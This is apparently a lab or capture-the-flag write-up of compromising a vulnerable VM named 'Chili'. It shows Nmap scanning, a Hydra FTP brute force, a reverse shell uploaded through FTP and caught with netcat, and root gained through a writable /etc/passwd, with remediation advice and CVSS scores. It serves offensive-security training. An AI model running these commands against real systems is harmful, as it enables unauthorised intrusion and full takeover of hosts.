## Version 1.4.1
## language: en

Feature:
  TOE:
    Chili
  Category:
    Brute Force
  Location:
    http://192.168.1.74/
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: Ascertain human interaction
  Goal:
    Take advantage of the web service to get shell
  Recommendation:
    Restrict the number of attempts to connect to the system

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | VMWare            |  16.0      |
    | Netcat            |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 13:09 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.024s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.094s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.011s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.0047s latency).
    Nmap scan report for 192.168.1.74
    Host is up (0.0072s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0066s latency).
    Nmap done: 256 IP addresses (6 hosts up) scanned in 7.49 seconds
    """
    Then I determined that the IP of the machine is 192.168.1.74
    And I scanned the IP and found it has 2 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.74
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 13:19 -05
    Nmap scan report for 192.168.1.74
    Host is up (0.0013s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd (Misconfigured)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    MAC Address: 00:0C:29:A8:80:A6 (VMware)
    Service Info: OS: Unix

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 10.81 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a chile [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I don't see anything interesting
    When I tried to find directories on the server with "dirb"
    """
    $ dirb http://192.168.1.74/
    """
    Then I didn't get anything useful either [evidences](nodirb.png)
    And I decided to change the attack vector, focus on port 21 (FTP)
    Then due to nmap's response about misconfiguration of the service
    """
    21/tcp open  ftp     vsftpd (Misconfigured)
    """
    Then I plan to carry out a brute force attack

  Scenario: Exploitation
    Given my idea was to brute force against the FTP service
    Then I used Hydra with the famous wordlist "rockyou.txt"
    """
    $ hydra -l chili -P rockyou.txt 192.168.1.74 ftp
    """
    And after a long time I didn't get the password [evidences](rockyou.txt)
    Then looking for some information I found this page
    """
    https://www.sniferl4bs.com/2020/02/adios-rockyoutxt-
    bienvenido-kaonashitxt.html
    """
    And it is basically a post where it announces an improved wordlist
    """
    Kaonashi.txt
    """
    Then I downloaded this wordlist and tried brute force again
    """
    $ hydra -l chili -P kaonashi14M.txt 192.168.1.74 ftp
    """
    And I successfully got the FTP service password [evidences](kaonashi.png)
    Then I was able to connect to the service [evidences](connectftp.png)
    """
    $ ftp 192.168.1.74
    Connected to 192.168.1.74.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.74:usuario): chili
    331 Please specify the password.
    Password:
    203 Login successful.
    Remote system type is UNIX
    using binary mode to transfer files.
    ftp>
    """
    And I thought of a way to get reverse shell
    Then my initial idea was to upload a reverse shell to the HTTP server
    And connect to this via Netcat
    Then this was possible because there was a folder with write permissions
    """
    ftp> ls -la
    ...
    drwxrwxrwx    2  0    0    4096 sep 08 13:14 .nano
    ...
    """
    And I was able to send via FTP the reverse shell [evidences](putshell.png)
    Then I triggered the shell via the HTTP server
    """
    http://192.168.1.74/.nano/reverse.php
    """
    And I got the shell with netcat [evidences](shell.png)
    """
    $ nc -lvnp 1234
    connect to [192.168.1.73] from (UNKNOWN) [192.168.1.74] 49330
    ...
    $
    """
    Then in this point the idea is get root privileges
    And one way to achieve this is through SUID binaries
    """
    $ find / -perm -u=s -type f 2>/dev/null
    /usr/bin/umount
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/mount
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/su
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    """
    Then I see that the passwd file had write permissions [evidences](pass.png)
    And I found that it is possible to escalate privileges with this file
    """
    https://security.stackexchange.com/questions/151700/
    privilege-escalation-using-passwd-file
    """
    Then it was simple, I encoded a password for a user
    And saved it to /etc/passwd as root
    Then I logged in [evidences](root.png)

  Scenario: Remediation
    Restrict the number of authentication attempts for the FTP service
    And avoid brute force attacks
    Then this can be achieved using CAPTCHA or incremental delays

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-10-08}
